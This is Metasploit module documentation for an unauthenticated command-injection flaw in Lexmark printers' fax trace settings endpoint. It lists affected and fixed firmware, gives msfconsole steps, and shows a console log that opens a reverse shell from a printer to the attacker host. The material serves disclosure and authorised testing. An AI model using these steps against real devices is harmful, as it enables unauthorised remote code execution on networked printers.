ContextQMD
Back to Metasploit Framework

Lexmark Faxtrace Settings

documentation/modules/exploit/linux/http/lexmark_faxtrace_settings.md

6.4.1318.7 KB
Original Source

Vulnerable Application

A unauthenticated Remote Code Execution vulnerability exists in the embedded webserver in certain Lexmark devices through 2023-02-19. The vulnerability is only exposed if, when setting up the printer or device, the user selects "Set up Later" when asked if they would like to add an Admin user. If no Admin user is created the endpoint /cgi-bin/fax_change_faxtrace_settings is accessible without authentication. The endpoint allows the user to configure a number of different fax settings.

A number of the configurable parameters on the page (ex. FT_Custom_lbtrace) fail to be sanitized properly before being used in an bash eval statement: eval "$cmd" > /dev/null, allowing for an unauthenticated user to run arbitrary commands.

Installation Steps

Testing of this module was performed on a physical device. Emulating firmware through qemu or similar methods have not been explored.

Affected Models

Lexmark ModelsAffected ReleasesFixed Releases
CX930, CX931, CX942,
CX943, CX944CXTPC.081.232 and previousCXTPC.081.233 and later
XC9325, XC9335, XC9445,
XC9455, XC9465CXTPC.081.232 and previousCXTPC.081.233 and later
CS943CSTPC.081.232 and previousCSTPC.081.233 and later
MX432MXTCT.081.232 and previousMXTCT.081.233 and later
XM3142MXTCT.081.232 and previousMXTCT.081.233 and later
MX931MXTPM.081.232 and previousMXTPM.081.233 and later
CX730, CX735CXTMM.081.232 and previousCXTMM.081.233 and later
XC4342, XC4352CXTMM.081.232 and previousCXTMM.081.233 and later
CS730, CS735CSTMM.081.232 and previousCSTMM.081.233 and later
C4342, C4352CSTMM.081.232 and previousCSTMM.081.233 and later
B2236MSLSG.081.232 and previousMSLSG.081.233 and later
MB2236MXLSG.081.232 and previousMXLSG.081.233 and later
MS331, MS431, MS439MSLBD.081.232 and previousMSLBD.081.233 and later
M1342MSLBD.081.232 and previousMSLBD.081.233 and later
B3442, B3340MSLBD.081.232 and previousMSLBD.081.233 and later
XM1342MXLBD.081.232 and previousMXLBD.081.233 and later
MX331, MX431MXLBD.081.232 and previousMXLBD.081.233 and later
MB3442MXLBD.081.232 and previousMXLBD.081.233 and later
MS321, MS421, MS521, MS621MSNGM.081.232 and previousMSNGM.081.233 and later
M1242, M1246MSNGM.081.232 and previousMSNGM.081.233 and later
B2338, B2442, B2546, B2650MSNGM.081.232 and previousMSNGM.081.233 and later
MS622MSTGM.081.232 and previousMSTGM.081.233 and later
M3250MSTGM.081.232 and previousMSTGM.081.233 and later
MX321MXNGM.081.232 and previousMXNGM.081.233 and later
MB2338MXNGM.081.232 and previousMXNGM.081.233 and later
MX421, MX521, MX522, MX622MXTGM.081.232 and previousMXTGM.081.233 and later
XM1242, XM1246, XM3250MXTGM.081.232 and previousMXTGM.081.233 and later
MB2442. MB2546, MB2650MXTGM.081.232 and previousMXTGM.081.233 and later
MS725, MS821, MS823, MS825MSNGW.081.232 and previousMSNGW.081.233 and later
B2865MSNGW.081.232 and previousMSNGW.081.233 and later
MS822, MS826MSTGW.081.232 and previousMSTGW.081.233 and later
M5255, M5270MSTGW.081.232 and previousMSTGW.081.233 and later
MX721, MX722, MX725,
MX822, MX826MXTGW.081.232 and previousMXTGW.081.233 and later
XM5365, XM5370, XM7355, XM7370MXTGW.081.232 and previousMXTGW.081.233 and later
MB2770MXTGW.081.232 and previousMXTGW.081.233 and later
C3426CSLBN.081.232 and previousCSLBN.081.233 and later
CS431, CS439CSLBN.081.232 and previousCSLBN.081.233 and later
CS331CSLBL.081.232 and previousCSLBL.081.233 and later
C3224, C3326CSLBL.081.232 and previousCSLBL.081.233 and later
C2326CSLBN.081.232 and previousCSLBN.081.233 and later
MC3426CXLBN.081.232 and previousCXLBN.081.233 and later
CX431CXLBN.081.232 and previousCXLBN.081.233 and later
XC2326CXLBN.081.232 and previousCXLBN.081.233 and later
MC3426CXLBN.081.232 and previousCXLBN.081.233 and later
MC3224, MC3326CXLBL.081.232 and previousCXLBL.081.233 and later
CX331CXLBL.081.232 and previousCXLBL.081.233 and later
CS622CSTZJ.081.232 and previousCSTZJ.081.233 and later
C2240CSTZJ.081.232 and previousCSTZJ.081.233 and later
CS421, CS521CSNZJ.081.232 and previousCSNZJ.081.233 and later
C2325, C2425, C2535CSNZJ.081.232 and previousCSNZJ.081.233 and later
CX522, CX622, CX625CXTZJ.081.232 and previousCXTZJ.081.233 and later
XC2235, XC4240CXTZJ.081.232 and previousCXTZJ.081.233 and later
MC2535, MC2640CXTZJ.081.232 and previousCXTZJ.081.233 and later
CX421CXNZJ.081.232 and previousCXNZJ.081.233 and later
MC2325, MC2425CXNZJ.081.232 and previousCXNZJ.081.233 and later
CX820, CX825, CX827, CX860CXTPP.081.232 and previousCXTPP.081.233 and later
XC6152, XC6153, XC8155,
XC8160, XC8163CXTPP.081.232 and previousCXTPP.081.233 and later
CS820, CS827CSTPP.081.232 and previousCSTPP.081.233 and later
C6160CSTPP.081.232 and previousCSTPP.081.233 and later
CS720, CS725, CS727, CS728CSTAT.081.232 and previousCSTAT.081.233 and later
C4150CSTAT.081.232 and previousCSTAT.081.233 and later
CX725, CX727CXTAT.081.232 and previousCXTAT.081.233 and later
XC4140, XC4143, XC4150, XC4153CXTAT.081.232 and previousCXTAT.081.233 and later
CS921, CS923, CS927CSTMH.081.232 and previousCSTMH.081.233 and later
C9235CSTMH.081.232 and previousCSTMH.081.233 and later
CX920, CX921, CX922,
CX923, CX924CXTMH.081.232 and previousCXTMH.081.233 and later
XC9225, XC9235, XC9245,
XC9255, XC9265CXTMH.081.232 and previousCXTMH.081.233 and later

Verification Steps

  1. Start msfconsole
  2. Do: use exploit/linux/http/lexmark_faxtrace_settings
  3. Do: set RHOST [IP]
  4. Do: set LHOST [IP]
  5. Do: exploit

Options

SLEEP

If the printer has been inactive for some time it might be sleeping, in which case it's best to send a request or two to wake it up before running the check method or exploit. This parameter indicates how to to wait for the printer to wake up.

Scenarios

Lexmark Printer MC3224 CXLBL.073.023

msf > use linux/http/lexmark_faxtrace_settings
[*] Using configured payload cmd/unix/reverse_socat_tcp
msf exploit(linux/http/lexmark_faxtrace_settings) > set rhosts 192.168.1.71
rhosts => 192.168.1.71
msf exploit(linux/http/lexmark_faxtrace_settings) > set lhost 192.168.1.72
lhost => 192.168.1.72
msf exploit(linux/http/lexmark_faxtrace_settings) > options

Module options (exploit/linux/http/lexmark_faxtrace_settings):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.1.71     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    80               yes       The target port (TCP)
   SLEEP    10               yes       Sleep time to wait for the print to wake
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_socat_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.72     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix (In-Memory)



View the full module info with the info, or info -d command.

msf exploit(linux/http/lexmark_faxtrace_settings) > run

[*] Started reverse TCP handler on 192.168.1.72:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Waking up the printer ...
[+] The target appears to be vulnerable. The vulnerable endpoint "/cgi-bin/fax_change_faxtrace_settings" is reachable
[*] Executing Unix (In-Memory) for cmd/unix/reverse_socat_tcp
[*] Command shell session 5 opened (192.168.1.72:4444 -> 192.168.1.71:54456) at 2023-08-30 19:51:57 -0400


Shell Banner:
httpd@ET788C773C36F9:/usr/share/web/cgi-bin$
-----


httpd@ET788C773C36F9:/usr/share/web/cgi-bin$ id
id
uid=985(httpd) gid=982(httpd) groups=982(httpd)
httpd@ET788C773C36F9:/usr/share/web/cgi-bin$ uname -a
uname -a
Linux ET788C773C36F9 4.17.19-yocto-standard-74b7175b2a3452f756ffa76f750e50db #1 SMP PREEMPT Mon Jun 29 19:46:01 UTC 2020 armv7l GNU/Linux
httpd@ET788C773C36F9:/usr/share/web/cgi-bin$